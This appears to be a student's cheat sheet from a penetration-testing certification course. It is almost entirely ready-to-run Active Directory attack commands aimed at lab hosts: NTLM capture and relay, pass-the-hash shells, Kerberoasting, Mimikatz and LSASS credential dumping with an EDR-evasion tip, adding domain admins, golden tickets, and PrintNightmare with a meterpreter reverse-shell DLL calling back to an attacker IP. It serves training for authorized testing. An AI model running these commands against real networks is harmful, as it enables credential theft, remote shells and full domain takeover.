Cheatsheet from the PJPT course of TCM security.
sudo arp-scan -l
netdiscover -r 192.168.5.0/24
nmap -T4 -p- -A 192.168.5.0/24
nmap -T4 -p- -A 192.168.5.1
nmap -T4 -p- -sS -sC 192.168.5.0/24
- Start Responder, to capture NTLMv2 hashes
sudo responder -I tun0 -dP
- If NTLMv2 hash was captured, copy it, save it to a txt file and crack it with hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
This attacks works, when SMB signing is disabled on the machines.
- Enumerate, if SMB signing is disabled
nmap -p445 192.168.5.0/24 --script=smb2-security-mode
- Make changes in the Responder configuration
sudo nano /etc/responder/Responder.conf
SMB = Off
HTTP = Off
- Start Responder
sudo responder -I tun0 -dP
- Setup the relay
# to dump password hashes
sudo ntlmrelayx.py -tf targets.txt -smb2support
# to create a interactive shell
sudo ntlmrelayx.py -tf targets.txt -smb2support -i
# to run commands to proof
sudo ntlmrelayx.py -tf targets.txt -smb2support -c "whoami"
Create a shell with psexec
# for domain users
psexec.py test.local/fcastle:'Password1'@192.168.5.1
# for local users
psexec.py fcastle:'Password1'@192.168.5.1
# with local user and password hash
psexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]
Create a shell with wmiexec
# with local user and password hash
wmiexec.py Administrator@192.168.5.1 --hashes [LM-hash]:[NTLM-hash]
Create a shell with smbexec
# with local user and password hash
smbexec.py test.local/fcastle:'Password1'@192.168.5.1
Create a shell with metasploit
use exploit/windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2
If IPv6 is activated in the network, but no DNS server in use, we can imitate one.
- Open mitm6 for target domain
sudo mitm6 -d test.local
- Start Ntlmrelayx.py
Ntlmrelayx.py -6 -t ldaps://192.168.5.1 -wh fakewpad.test.local -l lootme
- You results will save into: '/home/kali/lootme/domain_computers.html'
Domain Enumeration with ldapdomaindump
- Run ldapdomaindump against domain controller - this will create files with information in about the domain
sudo ldapdomaindump ldaps://192.168.5.1 -u 'test.local\fcastle\' -p Password1
- list all files and open the html files to investigate the domain information
# list all files
ls -l
# open up all html domain files
firefox domain_*.html
Domain Enumeration with Bloodhound
- Run bloodhound with credentials, to fetch information
sudo bloodhound-python -d [DOMAIN] -u [USERNAME] -p [USER-PW] -ns [DC-IP]
# example
sudo bloodhound-python -d test.local -u fcastle -p Password1 -ns 192.168.5.1 -c all
- Start up neo4j database and bloodhound to import the files
# if you started the database the first time, set a new password - REMEMBER THE PASSWORD!
sudo neo4j console
# start bloodhound
sudo bloodhound
- If bloodhound started, just drag and drop the json files into bloodhound and start investigation ;)
Domain Enumeration with Plumhound
- Start up neo4j database and bloodhound
# if you started the database the first time, set a new password - REMEMBER THE PASSWORD!
sudo neo4j console
# start bloodhound
sudo bloodhound
- Start Plumhound against the domain controller - BLOODHOUND MUST ALREADY RUNNING!
sudo python3 PlumHound.py --easy -p [USER-PW]
sudo python3 PlumHound.py -x tasks/default.tasks -p [USER-PW]
- Finally open up the browser and investigate the results
If we have credentials and have local admin privileges on a machine, we are able to dump the sam database of the computer.
If we have password hashes, but not able to crack them, we are able to use the hash to authenticate.
- Test your credentials in the network
# this will test your credentials via SMB on the whole network. If we got a (Pwn3d!) -> we have local admin rights on this machine
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1
# or with a password hash
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH]
- Let's dump some local hashes
# first way to do it - Secretsdump - With Credentials
secretsdump.py test.local\fcastle:Password1@192.168.5.2
# second way to do it - Secretsdump - With Password-Hash
secretsdump.py administrator@192.168.5.3 --hashes [LM-HASH]:[NT-HASH]
# third way to do it - Metasploit
use windows/smb/psexec
set SMBDomain test.local
set SMBUser fcastle
set SMBPass Password1
set RHOSTS 192.168.5.2
run
hashdump
Command | Description |
---|---|
--local-auth | authenticate locally to each target |
--sam | Dump SAM hashes from target system |
--lsa | Dump LSA secrets from target system |
--shares | enumerate shares and access |
-M | Specify the module |
-L | List available modules for each protocol |
- Let's use some Modules in crackmapexec
# Module: lsassy
crackmapexec smb 192.168.5.0/24 -d test.local -u administrator -H [HASH] --local-auth -M lsassy
# access the crackmapexec database
cmedb
Kerberoasting aims against accounts with a Service Principal Name (SPNs), for which every domain user is able to request a TGS for this user.
With the request, we get the password hash and crack it offline.
- Get SPNs with impacket
# Get SPNs with impacket GetUserSPNs
python GetUserSPNs.py test.local/fcastle:Password1 -dc-ip 192.168.5.1 -request
- Copy the hash/hashes and save to txt file - then run hashcat against it
# run hashcat to crack the hash
hashcat -m 13100 SPNs-hash.txt /usr/share/wordlists/rockyou.txt
If we have a active shell on a system, we can see all tokens on the machine.
With that, we are able to impersonate other users.
- For this specific scenario, we have a meterpreter shell
meterpreter > list_tokens -u
- Impersonate a user - example administrator
meterpreter > impersonate_token test\\administrator
- Credential Dumping with Mimikatz
mimikatz(powershell) # privilege::debug
mimikatz(powershell) # lsadump::lsa /patch
mimikatz(powershell) # sekurlsa::minidump lsass.DMP
mimikatz(powershell) # sekurlsa::logonPasswords
- LSASS dump file with Task Manager
# if you have a graphical user interface
# 1. Open Task Manager
# 2. Go to Details
# 3. Search for lsass.exe process
# 4. Right-click -> Create dump file (lsass.DMP)
# 5. Move the dump file to your kali machine
# 6. Extract passwords and password hashes: pypykatz lsa minidump lsass.DMP
- LSASS dump with procdump
# on target machine
procdump.exe -accepteula -ma lsass.exe out.dmp
procdump.exe -accepteula -ma “lsass.exe” out.dmp
# some edr search for lsass string - use PID instead of name
Get-Process lsass # PowerShell
tasklist | findstr lsass # CMD
# create a dump file
procdump.exe -accepteula -ma 580 out.dmp
- LSASS dump with Crackmapexec
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1 --lsa
# remind: we get password hashes and cleartext password, but they will not stored on the cmedb
crackmapexec smb 192.168.5.0/24 -d test.local -u fcastle -p Password1 -M lsassy
If we have the privileges with administrator account to add a compromised account to the local admin group or Domain Admin group.
How to add a new user and add him to domain admin group
# create a new user local user
net user /add pentester Please-Use-A-Strong-PW!56&
# add the user to local admin group
net localgroup Administrators pentester /add
How to add a new user and add him to domain admin group
# create a new user
net user /add pentester Please-Use-A-Strong-PW!56& /domain
# add the user to domain admin group
net group "Domain Admins" pentester /ADD /DOMAIN
cPasswords are still common in xml files, foundable on NETLOGON/SYSVOL share of the domain controller.
Microsoft accidenatially published the key to decrypt them :)
use auxiliary/smb_enum_gpp
# tool is default in kali
gpp-decrypt <PASSWORD>
secretsdump.py test.local\fcastle:Password1@192.168.5.2 -just-dc-ntlm
We are using Mimikatz for this step.
privilege::debug
# pull down the user we want
lsadump::lsa /inject /name:krbtgt
# Now create the golden ticket:
# we need following information from the output:
# SID of the domain
# NTLM hash of the krbtgt account
kerberos::golden /User:Administrator /domain:test.local /sid:S-1-5-21-3311685201-1443070845-3622335404 /krbtgt:3f5f8a614cf590401df166f81b87bf17 /id:500 /ptt
# next we want the golden ticket cmd
misc::cmd
# now check our privileges, with accessing another machine
dir \\Client-01\c$
NOTE: ZEROLOGON CAN CAUSE A REAL DAMAGE TO YOUR DOMAIN CONTROLLER - IN WORSE CASE YOU HAVE A INFUNCTIONAL DOMAIN CONTROLLER!
But Why? Because this vulnerability sets the Domain Controller password to null and take over the entire Domain Controller.
Pentest behaviour: You will and want test the domain controllers for the vulnerability. The exploitation is most of the time not necessary - talk with your client!
https://github.com/SecuraBV/CVE-2020-1472
- Let's test our Domain Controller, if we are vulnerable
# setup the scan script, if the DC is vulnerable
git clone https://github.com/SecuraBV/CVE-2020-1472.git
cd CVE-2020-1472
sudo pip3 install -r requirements.txt
# run a scan against the domain controller, to check if its vulnerable
python3 zerologon_tester.py DC-01 192.168.5.1
The PrintSpooler service has functions, that users can add printers. The Service is running as SYSTEM.
We are able to import a malicious dll, to get a shell as SYSTEM.
- Check if the target is vulnerable
rpcdump.py @192.168.5.3 | egrep 'MS-RPRN|MS-PAR'
# if: => vulnerable
# Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
# Protocol: [MS-RPRN]: Print System Remote Protocol
- Run the attack
# clone the repository
git clone https://github.com/cube0x0/CVE-2021-1675.git
# create a malicious DLL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ATTACKER-IP> LPORT=5555 -f dll > shell.dll
# host the malicious DLL and share it
# we are sharing the current directory
smbserver.py share . -smb2support
# create listener with Metasploit
use multi/handler
set LHOST <ATTACKER-IP>
set LPORT 5555
set payload windows/x64/meterpreter/reverse_tcp
# run the attack
python3 CVE-2021-1675.py test.local/f.castle:Password1@192.168.5.2 '\\<ATTACKER-IP>\share\shell.dll'
# we should get a meterpreter reverse shell
# now we can dump the hashes - WE ARE SYSTEM :)
hashdump
With this PE action, we are able to add a new user to the local admin group.
- Setup everything
# copy the raw PowerShell script into a new file
- Run attack
Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default
Invoke-Nightmare -DriverName "Xerox" -NewUser "pentester" -NewPassword "Use-A-Strong-Password!5@"